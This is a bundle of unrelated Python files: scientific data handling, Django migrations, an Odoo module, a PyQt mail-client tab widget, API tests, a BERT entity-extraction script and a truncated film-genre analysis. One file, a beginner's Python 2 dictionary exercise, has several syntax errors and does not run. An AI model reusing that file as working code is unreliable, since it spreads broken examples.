    if cut_tail:
        df = df.iloc[:-1]
    return df
def drop_obsession_WQCTS_out(df, **kwargs):
    """
    Apply drop_obsession_edge_int to each (I, J, K) group of a WQWCTS.OUT
    frame; kwargs are forwarded (e.g. cut_head/cut_tail).

    groupby.apply will modify the whole row order of df, which doesn't
    matter for in-group-only usage; the original order is restored by
    dropping the group index levels and sorting on the remaining index.
    """
    return df.groupby(["I", "J", "K"]).apply(lambda _df: drop_obsession_edge_int(_df, "TIME", **kwargs)).\
        reset_index(level=[0,1,2], drop=True).sort_index()
def append_WQWCTS_OUT(df1: pd.DataFrame, df2: pd.DataFrame):
    """Concatenate two WQWCTS.OUT frames after trimming duplicated edges.

    cut_tail=True on df1 => ..., 0.99976, 1.00024, ... -> ..., 1.00024, ...
    so the seam between the two runs carries no duplicated timestamp.

    Fix: uses pd.concat because DataFrame.append was removed in pandas 2.0.
    """
    df1 = drop_obsession_WQCTS_out(df1, cut_tail=True)
    df2 = drop_obsession_WQCTS_out(df2)
    return pd.concat([df1, df2]).reset_index(drop=True)
def append_qbal_out(df1: pd.DataFrame, df2: pd.DataFrame):
    # TODO, It's impossible to "recover" whole sequence according to current output format if we don't charge extra computation.
    # qbal output format: 0-0, 0-1, 0-2, ..., 0-23. How can we get result of 23-24 if we don't have 0-24?
    # Fine, someone sugguest their workaround at this time is an extra run with one more day to fetch the result...
    # Deliberately unimplemented until the format question above is resolved.
    raise NotImplementedError
def append_out_map(out_map1, out_map2):
    """Append two out_maps file-by-file using the per-file append strategy."""
    # TODO: since "exact" append_qbal_out is impossible to implement at this
    # time, is it useful to implement an approximated version to help pipeline?
    append_map = {"qbal.out": append_qbal_out, "WQWCTS.OUT": append_WQWCTS_OUT}
    result = {}
    for name, combine in append_map.items():
        result[name] = combine(out_map1[name], out_map2[name])
    return result
|
import ROOT
from ROOT import TLorentzVector
def lepHasOverlap(Chain, index, isGen = False):
    """Return True if the lepton at `index` lies within dR < 0.4 of any
    POG-loose lepton of a *different* flavor in the event.

    NOTE(review): `isGen` is accepted but never used - confirm whether a
    gen-level variant was intended.
    """
    #Check the flavor of the lepton and initialize variables
    hasOverlap = False
    inputVec = TLorentzVector()
    inputVec.SetPtEtaPhiE(Chain._lPt[index], Chain._lEta[index], Chain._lPhi[index], Chain._lE[index])
    #Loop over all leptons with a different flavor
    # NOTE(review): _nL appears to be stored as a single byte (hence ord()) -
    # confirm against the ntuple definition.
    for l in xrange(ord(Chain._nL)):
        if l == index or Chain._lFlavor[l] == Chain._lFlavor[index]: continue
        if not Chain._lPOGLoose[l]: continue
        lVec = TLorentzVector()
        lVec.SetPtEtaPhiE(Chain._lPt[l], Chain._lEta[l], Chain._lPhi[l], Chain._lE[l])
        dR = inputVec.DeltaR(lVec)
        if dR < .4: hasOverlap = True
    return hasOverlap
def matchHasOverlap(Chain, index): #Only works for taus at the moment
    """Return True if the gen-matched lepton at `index` lies within dR < 0.4
    of any non-tau generator lepton.

    Fix: the flavor veto previously compared the whole _gen_lFlavor array
    to 2 instead of the element for lepton `l`, so the cut never applied
    per-lepton.
    """
    hasOverlap = False
    inputVec = TLorentzVector()
    inputVec.SetPtEtaPhiE(Chain._lMatchPt[index], Chain._lMatchEta[index], Chain._lMatchPhi[index], Chain._lMatchE[index])
    for l in xrange(ord(Chain._gen_nL)):
        # Skip the lepton itself and generator taus (flavor code 2).
        if l == index or Chain._gen_lFlavor[l] == 2: continue
        lVec = TLorentzVector()
        lVec.SetPtEtaPhiE(Chain._gen_lPt[l], Chain._gen_lEta[l], Chain._gen_lPhi[l], Chain._gen_lE[l])
        dR = inputVec.DeltaR(lVec)
        if dR < .4: hasOverlap = True
    return hasOverlap
def findMatchLepton(Chain, index):
    """Find the closest prompt generator lepton to reco lepton `index`.

    Returns the gen-lepton index when the best match is within dR < 0.3,
    otherwise -1.

    NOTE(review): the first cut skips gen leptons whose flavor EQUALS the
    reco flavor; for reco-gen matching one would normally require the SAME
    flavor - confirm whether this is intentional (e.g. tau-specific logic,
    cf. matchHasOverlap above).
    """
    out_index = None
    inputVec = TLorentzVector()
    inputVec.SetPtEtaPhiE(Chain._lPt[index], Chain._lEta[index], Chain._lPhi[index], Chain._lE[index])
    minDeltaR = 9999999.
    for l in xrange(ord(Chain._gen_nL)):
        if Chain._gen_lFlavor[l] == Chain._lFlavor[index]: continue
        if not Chain._gen_lIsPrompt[l]: continue
        lVec = TLorentzVector()
        lVec.SetPtEtaPhiE(Chain._gen_lPt[l], Chain._gen_lEta[l], Chain._gen_lPhi[l], Chain._gen_lE[l])
        dR = inputVec.DeltaR(lVec)
        if dR < minDeltaR:
            out_index = l
            minDeltaR = dR
    if minDeltaR < .3:
        return out_index
    else:
        return -1
def ZMassReconstructed(Chain):
    """Return True if any same-flavor pair of POG-tight light leptons
    (flavor != 2, i.e. not taus) has an invariant mass within 10 GeV of
    the Z mass (91.1876 GeV).
    """
    bestMassDiff = 9999999.
    #Start looping over the first leptons
    for l1 in xrange(ord(Chain._nL)-1):
        if not Chain._lPOGTight[l1] or Chain._lFlavor[l1] == 2: continue
        l1Vec = TLorentzVector()
        l1Vec.SetPtEtaPhiE(Chain._lPt[l1], Chain._lEta[l1], Chain._lPhi[l1], Chain._lE[l1])
        #Start looping over the second lepton
        for l2 in xrange(l1+1, ord(Chain._nL)):
            if(not Chain._lPOGTight[l2] or Chain._lFlavor[l2] == 2): continue
            if(Chain._lFlavor[l1] != Chain._lFlavor[l2]): continue
            l2Vec = TLorentzVector()
            l2Vec.SetPtEtaPhiE(Chain._lPt[l2], Chain._lEta[l2], Chain._lPhi[l2], Chain._lE[l2])
            mass = (l1Vec + l2Vec).M()
            # Track the smallest |m_ll - m_Z| over all candidate pairs.
            if(abs(mass - 91.1876)< bestMassDiff):
                bestMassDiff = abs(mass - 91.1876)
            #print l1, l2, mass, bestMassDiff
    if bestMassDiff < 10.: return True
    return False
|
# Generated by Django 3.0.4 on 2020-04-05 09:26
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration for the shopWeb app: adds the
    Products model and removes AcademicCourseComplaint and Complaint."""

    dependencies = [
        ('shopWeb', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='Products',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('Name', models.TextField()),
                # NOTE(review): empty upload_to stores images directly under
                # MEDIA_ROOT - confirm that is intended.
                ('Product_Image', models.ImageField(upload_to='')),
                ('Category', models.CharField(max_length=150)),
                ('Description', models.TextField()),
                ('Price', models.CharField(max_length=150)),
            ],
        ),
        migrations.DeleteModel(
            name='AcademicCourseComplaint',
        ),
        migrations.DeleteModel(
            name='Complaint',
        ),
    ]
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution, third party addon
# Copyright (C) 2017- Vertel AB (<http://vertel.se>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, fields, api, _
import logging
_logger = logging.getLogger(__name__)
class ir_rule(models.Model):
    """Extends ir.rule to (re)initialize the multi-company product rule."""
    _inherit = 'ir.rule'

    @api.model
    def init_records(self):
        # Rewrite the stock product_comp_rule domain so that products linked
        # to no company (company_ids is False) stay visible to every company.
        product_comp_rule = self.env.ref('product.product_comp_rule')
        product_comp_rule.write({'domain_force': "['|',('company_ids','=',user.company_id.id),('company_ids','=',False)]"})
class product_template(models.Model):
    """Adds a many2many companies field to product templates."""
    _inherit = 'product.template'

    # Companies this product belongs to; the ir.rule above treats an empty
    # set as visible to all companies.
    company_ids = fields.Many2many(comodel_name='res.company', string='Companies')
|
# this project is licensed under the WTFPLv2, see COPYING.wtfpl for details
from PyQt5.QtWidgets import (
QTabWidget, QAction,
)
from PyQt5.QtCore import pyqtSlot as Slot, pyqtSignal as Signal
from PyQt5.QtGui import QKeySequence
from .threads_widget import ThreadsWidget
from .thread_widget import ThreadWidget
from .compose import ComposeWidget
class TabWidget(QTabWidget):
    """Main tab container hosting threads-list, thread and compose widgets.

    Installs keyboard shortcuts for closing the current tab and for cycling
    to the previous/next tab, and always keeps at least one tab open.
    """

    def __init__(self, *args, **kwargs):
        super(TabWidget, self).__init__(*args, **kwargs)
        self.tabCloseRequested.connect(self._closeTabRequested)
        # Platform "close" shortcut (e.g. Ctrl+W) closes the current tab.
        action = QAction(self)
        action.setShortcuts(QKeySequence.Close)
        action.triggered.connect(self.closeCurrentTab)
        self.addAction(action)
        # Ctrl+PageUp / Ctrl+PageDown cycle through the tabs.
        action = QAction(self)
        action.setShortcuts(QKeySequence('Ctrl+Page Up'))
        action.triggered.connect(self.moveToPreviousTab)
        self.addAction(action)
        action = QAction(self)
        action.setShortcuts(QKeySequence('Ctrl+Page Down'))
        action.triggered.connect(self.moveToNextTab)
        self.addAction(action)
        # Start with a single threads-list tab.
        self.addThreads()

    def addThreads(self):
        """Open a new threads-list tab and return its widget."""
        w = ThreadsWidget(parent=self)
        w.threadActivated.connect(self.addThread)
        w.tagActivated.connect(self._addThreadsTag)
        self._addTab(w, focus=True)
        return w

    @Slot(str)
    def _addThreadsTag(self, tag):
        # Open a threads-list tab pre-filtered on the activated tag.
        w = self.addThreads()
        w.setQueryAndSearch('tag:%s' % tag)

    @Slot(str)
    def addThread(self, tid):
        """Open a tab showing the thread with id `tid`; return the widget."""
        w = ThreadWidget(tid, parent=self)
        w.triggeredReply.connect(self.addReply)
        w.triggeredResumeDraft.connect(self.addResumeDraft)
        self._addTab(w, focus=True)
        return w

    @Slot(str, bool)
    def addReply(self, mid, to_all):
        """Open a compose tab replying to message `mid` (reply-all if `to_all`)."""
        w = ComposeWidget(parent=self)
        w.sent.connect(self._closeCompose)
        w.setReply(mid, to_all)
        self._addTab(w, focus=True)
        return w

    @Slot(str)
    def addResumeDraft(self, mid):
        """Open a compose tab resuming the draft message `mid`."""
        w = ComposeWidget(parent=self)
        w.sent.connect(self._closeCompose)
        w.setFromDraft(mid)
        self._addTab(w, focus=True)
        return w

    @Slot()
    def addCompose(self):
        """Open an empty compose tab; return the widget."""
        w = ComposeWidget(parent=self)
        w.sent.connect(self._closeCompose)
        self._addTab(w, focus=True)
        return w

    @Slot()
    def _closeCompose(self):
        # A compose widget emitted `sent`: remove its tab and delete it.
        w = self.sender()
        idx = self.indexOf(w)
        self.removeTab(idx)
        w.deleteLater()

    @Slot(str)
    def addForward(self, mid):
        # TODO: forwarding is not implemented yet.
        pass

    def _addTab(self, widget, focus=False):
        # Insert the widget as a tab and keep the tab text synced with the
        # widget's window title.
        idx = self.addTab(widget, widget.windowTitle())
        widget.windowTitleChanged.connect(self._tabTitleChanged)
        if focus:
            self.setCurrentIndex(idx)
        return idx

    @Slot(int)
    def _closeTabRequested(self, idx):
        # Never close the last remaining tab.
        if self.count() > 1:
            self.removeTab(idx)

    @Slot()
    def closeCurrentTab(self):
        if self.count() > 1:
            self.removeTab(self.currentIndex())

    def removeTab(self, idx):
        # Detach the widget so it is not kept alive by the tab widget.
        w = self.widget(idx)
        super(TabWidget, self).removeTab(idx)
        w.setParent(None)

    @Slot()
    def moveToNextTab(self):
        # Wraps around at the last tab.
        idx = (self.currentIndex() + 1) % self.count()
        self.setCurrentIndex(idx)

    @Slot()
    def moveToPreviousTab(self):
        # Wraps around at the first tab.
        idx = (self.currentIndex() - 1) % self.count()
        self.setCurrentIndex(idx)

    @Slot(str)
    def _tabTitleChanged(self, title):
        widget = self.sender()
        idx = self.indexOf(widget)
        if idx < 0:
            return
        self.setTabText(idx, title)
        self.someTabTitleChanged.emit()

    # Emitted whenever any tab's title changes.
    someTabTitleChanged = Signal()
|
from threading import Thread
import threading
import time
def qsort(sets, left, right):
    """Sort sets[left:right+1] in place with a threaded quicksort.

    Partitions around the middle element (Hoare-style) and sorts each
    non-trivial partition in its own thread, joining both before returning
    the (mutated) list.

    Fix: corrected the "thead" typo in the progress message; the temp-swap
    is replaced by an idiomatic tuple swap.
    """
    print("thread {0} is sorting {1}".format(threading.current_thread(), sets[left:right]))
    i = left
    j = right
    pivot = int(sets[int((left + right) / 2)])
    while i <= j:
        while pivot > sets[i]:
            i = i + 1
        while pivot < sets[j]:
            j = j - 1
        if i <= j:
            # Tuple swap instead of a temp variable.
            sets[i], sets[j] = sets[j], sets[i]
            i = i + 1
            j = j - 1
    lthread = None
    rthread = None
    # Recurse into each remaining partition on its own thread.
    if (left < j):
        lthread = Thread(target=lambda: qsort(sets, left, j))
        lthread.start()
    if (i < right):
        rthread = Thread(target=lambda: qsort(sets, i, right))
        rthread.start()
    if lthread is not None: lthread.join()
    if rthread is not None: rthread.join()
    return sets
'''testing below'''
# NOTE(review): this demo runs at import time; consider guarding it with
# `if __name__ == '__main__':` so importing the module stays side-effect free.
ls = [1, 3, 6, 9, 1, 2, 3, 8, 6, 11, 15, 25, 3, 64, 17]
res = qsort(ls, 0, len(ls) - 1)
print(res)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayOpenLotteryRegionCreateResponse(AlipayResponse):
    """Response wrapper for the alipay.open.lottery.region.create API,
    exposing the region_id returned by the gateway."""

    def __init__(self):
        super(AlipayOpenLotteryRegionCreateResponse, self).__init__()
        # Identifier of the created lottery region; None until parsed.
        self._region_id = None

    @property
    def region_id(self):
        return self._region_id

    @region_id.setter
    def region_id(self, value):
        self._region_id = value

    def parse_response_content(self, response_content):
        """Populate fields from the raw gateway response payload."""
        response = super(AlipayOpenLotteryRegionCreateResponse, self).parse_response_content(response_content)
        if 'region_id' in response:
            self.region_id = response['region_id']
|
import pytest
import requests
class TestEventsUserScope(object):
    """Integration tests for the user-scope /events/ API endpoints."""

    # Environment used by the happy-path tests.
    env_id = "5"
    # Pre-existing event expected when filtering by scope.
    event_id = "BeforeInstanceLaunch"
    scope = "scalr"

    def test_events_create(self,api):
        """Create a custom event and return the created payload.

        NOTE(review): pytest ignores (and newer versions warn about)
        non-None return values from tests - confirm whether this was meant
        to be a fixture or helper instead.
        """
        create_resp = api.create("/api/v1beta0/user/envId/events/",
                                 params=dict(envId=self.env_id),
                                 body=dict(
                                     description = "test event",
                                     id = "create event"
                                 ))
        return create_resp.box().data

    def test_events_list(self, api):
        """A freshly created event appears first in the list response."""
        create_resp = api.create("/api/v1beta0/user/envId/events/",
                                 params=dict(envId=self.env_id),
                                 body=dict(
                                     description = "test event",
                                     id = "list event"))
        resp_event_id = create_resp.json()['data']['id']
        resp = api.list(
            "/api/v1beta0/user/envId/events/",
            params=dict(
                envId=self.env_id))
        assert resp.json()['data'][0]['id'] == resp_event_id

    def test_events_list_filters(self, api):
        """Filtering by scope=scalr returns the well-known built-in event."""
        resp = api.list(
            "/api/v1beta0/user/envId/events/",
            params=dict(envId=self.env_id),
            filters=dict(scope=self.scope))
        assert resp.json()['data'][0]['id'] == self.event_id

    def test_event_list_invalid_envId(self, api):
        """An unknown environment id yields a 404 with an explanatory message."""
        invalid_envId = 4
        exc_message = "Invalid environment."
        with pytest.raises(requests.exceptions.HTTPError) as err:
            resp = api.list(
                "/api/v1beta0/user/envId/events/",
                params=dict(
                    envId=invalid_envId))
        assert err.value.response.status_code == 404
        assert exc_message in err.value.response.text

    def test_role_categories_list_noassecc_envId(self, api):
        """An environment the user cannot access yields a 403."""
        noaccess_envId = 13
        exc_message = "You don't have access to the environment."
        with pytest.raises(requests.exceptions.HTTPError) as err:
            resp = api.list(
                "/api/v1beta0/user/envId/events/",
                params=dict(
                    envId=noaccess_envId))
        assert err.value.response.status_code == 403
        assert exc_message in err.value.response.text
|
from transformers import BertTokenizer
from transformers import BertForTokenClassification
from transformers import BertConfig
from transformers import AdamW, WarmupLinearSchedule
import torch
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
import json
import os
from tqdm import tqdm
import argparse
from sklearn.model_selection import train_test_split
from sklearn.metrics import f1_score, precision_score, recall_score
import numpy as np
import codecs
from utils import produce_length, make_label
# Restrict the CUDA devices visible to this process (use GPU #2 only).
os.environ["CUDA_VISIBLE_DEVICES"] = '2'
def translate(word, label):
    """Decode a B/I/E/O tag sequence into entity records.

    Walks the per-character labels; each span opened by a B-* tag and
    closed by the next E-* tag becomes {'word': <characters>, 'type':
    <label suffix after "X-">}. Entities left open at the end (no E tag)
    are dropped, matching the original behavior.

    Fix: the old implementation tracked a running `len_entity` counter that
    was only reset on 'O', so after the first entity the slice
    word[begin:begin+len_entity+1] overran into the following characters.
    The span is now taken directly as word[begin:i+1].
    """
    begin = 0
    record = []
    for i in range(len(label)):
        tag = label[i]
        if tag == 'O':
            continue
        if tag[0] == 'B':
            # Start of a new entity span.
            begin = i
        elif tag[0] == 'E':
            # End of the current span: emit the surface form and its type.
            record.append({
                'word': ''.join(word[begin:i + 1]),
                'type': tag[2:],
            })
        # 'I' tags simply continue the current span.
    return record
def get_input(debug=True):
    """Build the BERT input token/label sequences from tmp/input.json.

    Reads the sentence and its entity mentions, produces per-character
    labels (all "O" initially, then overwritten by make_label for each
    mention span), and wraps the sequence in [CLS]/[SEP] markers.

    Returns (input_word_list, input_label_list), each a list containing a
    single sequence.
    NOTE(review): `debug` is accepted but never used.
    """
    input_word_list = []
    input_label_list = []
    with open("tmp/input.json", 'r', encoding='UTF-8') as f:
        data = json.load(f)
        bert_words = list(data["sentence"])
        label_list = ["O" for _ in bert_words]  # start from an all-"O" labelling
        for entity in data["entity-mentions"]:
            en_start = entity["start"]
            en_end = entity["end"]
            en_type = entity["entity-type"]
            # Overwrite labels for the mention span according to its type.
            make_label(en_start, en_end, en_type, label_list)
        input_word_list.append(["[CLS]"]+bert_words+["[SEP]"])
        input_label_list.append(["O"]+label_list+["O"])
    return input_word_list, input_label_list
def show_args(args):
    """Print the parsed command-line arguments for debugging."""
    print(args)
def eval_predict(pred_list, label_list):
    """Evaluate predictions with micro-averaged F1, precision and recall.

    Returns the tuple (f1, precision, recall).
    """
    micro = {"average": "micro"}
    return (
        f1_score(label_list, pred_list, **micro),
        precision_score(label_list, pred_list, **micro),
        recall_score(label_list, pred_list, **micro),
    )
class labelproducer:
    """Maps NER label strings to integer ids and back."""

    def __init__(self, all_labels):
        # all_labels is a list of per-sentence label lists.
        self.target_to_ids = self.get_target_to_ids(all_labels)
        # Fixed decoding table used at prediction time.
        self.ids_to_target = {0:'O', 1: 'B-company', 2: 'I-company', 3: 'E-company', 4: 'B-department', 5: 'I-department', 6: 'E-department', 7: 'B-people', 8: 'E-people', 9: 'I-people', 10: 'B-product', 11: 'I-product', 12: 'E-product'}

    def get_target_to_ids(self, all_labels):
        """Assign each distinct label an integer id in first-seen order."""
        mapping = dict()
        for sentence_labels in all_labels:
            for lab in sentence_labels:
                # Insert with the next free id only when unseen.
                mapping.setdefault(lab, len(mapping))
        return mapping

    def convert_label_to_ids(self, labels):
        """Map a list of label strings to their integer ids."""
        return [self.target_to_ids[lab] for lab in labels]

    def convert_ids_to_label(self, all_ids):
        """Map a list of integer ids back to label strings."""
        return [self.ids_to_target[i] for i in all_ids]
if __name__=="__main__":
    # ---- Read the sentence to predict and stage it as model input ----
    sentence = input("请输入你想预测的句子:")
    dict_bert = {}
    dict_bert['entity-mentions'] = []
    dict_bert['sentence'] = sentence
    final_json = json.dumps(dict_bert, indent=4, ensure_ascii=False)
    with codecs.open("tmp/input.json", 'w', 'utf-8') as file:
        file.write(final_json)
    # ---- Model configuration ----
    parser = argparse.ArgumentParser()
    parser.add_argument("--val_split", default=0.5, type=float)
    parser.add_argument("--BERT_HOME", default="/data1/shgpu/sh/new/project/gingko/code/Bert_EntityExtraction/model/chinese_L-12_H-768_A-12/", type=str)
    parser.add_argument("--no_cuda", action="store_true", default=False)
    parser.add_argument("--seed", default=2019, type=int, help="随机模型初始化的随机种子")
    parser.add_argument("--test_batch_size", default=1, type=int)
    parser.add_argument("--max_len", default=256, type=int)
    parser.add_argument("--adam_epsilon", default=1e-5, type=float)
    parser.add_argument("--warmup_steps", default=0, type=int)
    parser.add_argument("--max_grad_norm", default=1.0, type=float)
    parser.add_argument("--model_name", default="bert-base-chinese", type=str)
    args = parser.parse_args()
    BERT_HOME = args.BERT_HOME
    tokenizer = BertTokenizer.from_pretrained(os.path.join(BERT_HOME, "vocab.txt"), do_lower_case=True)
    # Fix: n_gpu must be defined on the CPU path too; it was previously only
    # assigned inside the CUDA branch but referenced unconditionally below,
    # raising NameError when CUDA is unavailable or --no_cuda is set.
    n_gpu = 0
    if not args.no_cuda and torch.cuda.is_available():
        device = torch.device("cuda")
        n_gpu = torch.cuda.device_count()
    else:
        device = torch.device("cpu")
    # Seed every RNG that may be used.
    np.random.seed(args.seed)
    torch.manual_seed(args.seed)
    if n_gpu>0:
        torch.cuda.manual_seed_all(args.seed)
    # Build the full input set.
    input_word_list, input_label_list = get_input()
    input_word_list_original = input_word_list[0].copy()
    # Pad/trim sequences to max_len.
    input_word_list, attention_mask = produce_length(input_word_list, args.max_len, "[PAD]", ret_attention_mask=True)
    input_label_list = produce_length(input_label_list, args.max_len, "O", ret_attention_mask=False)
    # Convert tokens to vocabulary ids.
    input_word_ids = [tokenizer.convert_tokens_to_ids(word_list) for word_list in input_word_list]
    # Convert labels to ids.
    lp = labelproducer(input_label_list)
    input_label_list = [lp.convert_label_to_ids(labels) for labels in input_label_list]
    # Wrap the test data as tensors.
    test_input_ids = torch.tensor(input_word_ids, dtype=torch.long)
    test_label = torch.tensor(input_label_list, dtype=torch.long)
    test_attention_mask = torch.tensor(attention_mask, dtype=torch.long)
    # Batched data loader over the test set.
    test_data = TensorDataset(test_input_ids, test_attention_mask, test_label)
    test_sampler = SequentialSampler(test_data)
    test_dataloader = DataLoader(test_data, sampler=test_sampler, batch_size=args.test_batch_size)
    # Build the model and load the fine-tuned weights.
    print("load config from: {}".format(os.path.join(BERT_HOME, "bert_config.json")))
    config = BertConfig.from_pretrained(os.path.join(BERT_HOME, "bert_config.json"), num_labels=13)
    model = BertForTokenClassification.from_pretrained(BERT_HOME, config=config)
    model.to(device)
    model.load_state_dict(torch.load("./model/pretrain_bert.pth"))
    model.eval()
    with torch.no_grad():
        pred_list = []
        label_list = []
        for step, batch in enumerate(test_dataloader):
            # Fix: move the batch to the model's device unconditionally;
            # previously this happened only when exactly one GPU was present,
            # leaving CPU tensors paired with a GPU model otherwise.
            batch = tuple(t.to(device) for t in batch)
            test_input_ids, test_attention_mask, label_ids = batch
            outputs = model(test_input_ids, attention_mask=test_attention_mask)
            logits = outputs[0]
            pred_ids = torch.argmax(logits, dim=-1).detach().cpu().numpy().tolist()
            label_ids = label_ids.detach().cpu().numpy().tolist()
            # Keep only positions that are real tokens per the attention mask.
            for index_pred, pred in enumerate(pred_ids):
                pred_list_sentence = []
                label_list_sentence = []
                for index_p, p in enumerate(pred):
                    if test_attention_mask[index_pred][index_p] == 1:
                        pred_list_sentence.append(p)
                        label_list_sentence.append(label_ids[index_pred][index_p])
                pred_list.append(pred_list_sentence)
                label_list.append(label_list_sentence)
    # Decode the predicted label ids and extract entities.
    input_word_label = lp.convert_ids_to_label(pred_list[0])
    # test_f1, test_p, test_r = caculate_report(label_list, pred_list, lp.convert_ids_to_label)
    result = translate(input_word_list_original, input_word_label)
    for i in range(len(result)):
        print("识别到实体 "+result[i]['word']+" 类型为"+result[i]['type'])
    # Pair up recognized entities for downstream relation extraction:
    # company-company pairs keep document order; product/department/people
    # entities are paired with any later company, company first.
    entity_pair = []
    for i in range(len(result)):
        if result[i]['type'] == 'company':
            for j in range(i + 1, len(result)):
                if result[j]['type'] == 'company':
                    entity_pair.append([result[i]['word'], result[j]['word']])
        if result[i]['type'] in ('product', 'department', 'people'):
            for j in range(i + 1, len(result)):
                if result[j]['type'] == 'company':
                    entity_pair.append([result[j]['word'], result[i]['word']])
    for i in range(len(entity_pair)):
        # Fix: use a context manager so each output file is closed (the
        # original flushed but never closed the handles).
        with open("/data1/shgpu/sh/new/project/gingko/code/ChineseNRE/data/origin_data/test_"+str(i)+".txt", 'w') as pair_file:
            pair_file.write(entity_pair[i][0]+"\t"+entity_pair[i][1]+"\t"+"管理"+"\t"+sentence)
    print(entity_pair)
"""Unit test suite for the Bytes Streams examples in the AWS-hosted documentation.
.. note::
These tests rely on discoverable AWS credentials existing.
"""
import os
import tempfile
import pytest
from .test_i_aws_encrytion_sdk_client import skip_tests, SKIP_MESSAGE
from .docs_examples_bytes import cycle_file
@pytest.mark.skipif(skip_tests(), reason=SKIP_MESSAGE)
def test_cycle_file():
    """Round-trip 1 KiB of random bytes through cycle_file and clean up.

    Fix: tempfile.mkstemp returns an open OS-level file descriptor that the
    caller must close; it was previously leaked, which also prevents the
    file from being deleted on Windows.
    """
    handle, filename = tempfile.mkstemp()
    os.close(handle)
    with open(filename, 'wb') as f:
        f.write(os.urandom(1024))
    try:
        new_files = cycle_file(source_plaintext_filename=filename)
        for f in new_files:
            os.remove(f)
    finally:
        os.remove(filename)
|
# Francis Amani
# Python 2.0
""" Dictionaries """
# First Trial
print ''
student_details = { 'id':"16671/1313", 'name': "John Doe"
}
print student_details ['id']
# Second trial
print ''
student_details ['course'] = 'computer science'
print student_details
# Third trial
name = (raw.input('Kindly provide us with your name?\n'))
school_id = (raw_input('Provide us with your school ID?\n'))
entry_year = (raw.input('What year did you join?\n'))
gender = (raw.input('Are you male or female?\n'))
course = (raw.input('What course are you pursuing?\n'))
age = (raw.input('How old are you?\n'))
student details = {'name':name, 'school_id':school_id, 'entry_year':entry_year, 'gender'}
str(student_details)
print(student_details)
print(len(student_details))
print(student_details.keys())
print(student_details.values())
# For loops
for age in range(1,20):
print age
# Looping a score list
list = [1,5,15]
for x in list:
print list
|
# Generated by Django 3.1.7 on 2021-03-29 12:47
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration for the blogger app: adds bio, permission
    and updated_at fields to Blog and tightens several field lengths."""

    dependencies = [
        ('blogger', '0009_auto_20210326_1344'),
    ]

    operations = [
        migrations.AddField(
            model_name='blog',
            name='bio',
            field=models.TextField(default="I'm Empty", max_length=1500),
        ),
        migrations.AddField(
            model_name='blog',
            name='permission',
            field=models.BooleanField(default=False),
        ),
        migrations.AddField(
            model_name='blog',
            name='updated_at',
            field=models.DateTimeField(auto_now=True, verbose_name='update timestamp'),
        ),
        migrations.AlterField(
            model_name='blog',
            name='title',
            field=models.CharField(max_length=50),
        ),
        migrations.AlterField(
            model_name='comment',
            name='comment_post',
            field=models.CharField(max_length=300),
        ),
        migrations.AlterField(
            model_name='post',
            name='subject',
            field=models.CharField(max_length=50),
        ),
        migrations.AlterField(
            model_name='post',
            name='text',
            field=models.TextField(max_length=1500),
        ),
    ]
|
"""
SCRIPT 1:
This script calculates the average topic distributions and average syntactic measures.
1. Function "get_genre_averages" is used for genre averages
2. Function "get_decade_averages" is used for decade averages
3. Results are saved as .csv and .png files
"""
import os
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import warnings
#Set sample variable according to the FEATURE_MATRIX variable
sample = "sample_1930-2010"
MATRIX_DIR = "XXX\\filmgenre_classification\\9_featureMatrix"
RESULT_DIR = "XXX\\filmgenre_classification\\12-2_featureAverages"
# Fix: removed a stray closing parenthesis that made this line a SyntaxError.
FEATURE_MATRIX = MATRIX_DIR + "\\" + sample + "_feature_matrix.csv"
matrix_df = pd.read_csv(FEATURE_MATRIX)
#pd.set_option('max_columns', 20)
# NOTE(review): the 'seaborn-whitegrid' style name was renamed to
# 'seaborn-v0_8-whitegrid' in matplotlib 3.6+ - confirm the pinned version.
plt.style.use('seaborn-whitegrid')
warnings.simplefilter(action='ignore', category=FutureWarning)
def get_genre_averages(matrix_df):
    """Average topic distributions, syntactic measures and document length
    per genre; write csv summaries and save/plot summary figures under
    RESULT_DIR.

    Bug fix: the doclength savefig() call was missing the "+" between
    ``sample`` and the file-name suffix (a SyntaxError).
    """
    #genre_list = ["Action", "Adventure", "Animation", "Comedy", "Crime", "Drama", "Family", "Fantasy", "History", "Horror", "Musical", "Mystery", "Romance", "Sci-Fi", "Thriller", "War", "Western"]
    genre_list = ["Action", "Adventure", "Animation", "Crime", "Family", "Fantasy", "History", "Horror", "Musical", "Mystery", "Romance", "Sci-Fi", "Thriller", "War", "Western"]
    syns = ["ADJCL", "CNPC", "CNPS", "DPPC", "MLC", "MLNP", "MLS", "NPPS","PASSPS","SCR"]
    genre_average_topics = {}
    genre_average_doclength = {}
    genre_top_10_topics = {}
    genre_average_syn = {}
    for genre in genre_list:
        # A movie can carry several genres, hence the substring match.
        genre_df = matrix_df[matrix_df["genres"].str.contains(genre)]
        #Get topic columns and their means (columns 6..-10 hold the topics)
        topic_columns = genre_df.iloc[:, 6:-10]
        averaged_topics = topic_columns.mean()
        genre_average_topics[genre] = averaged_topics.to_dict()
        #Get syntactic columns and their means (last 10 columns)
        syn_columns = genre_df.iloc[:, -10:]
        averaged_syn = syn_columns.mean()
        genre_average_syn[genre] = averaged_syn.to_dict()
        #Get documentLength column and the mean for each genre
        doclength_column = genre_df.iloc[:,5]
        averaged_doclength = doclength_column.mean()
        genre_average_doclength[genre] = averaged_doclength
    ######################
    #   Topic averages   #
    ######################
    topic_average_df = pd.DataFrame.from_dict(genre_average_topics)
    for genre in genre_list:
        #Find rows with highest values for each genre
        top_10_topics = topic_average_df.nlargest(10, genre)
        #Find topic names in index of each row
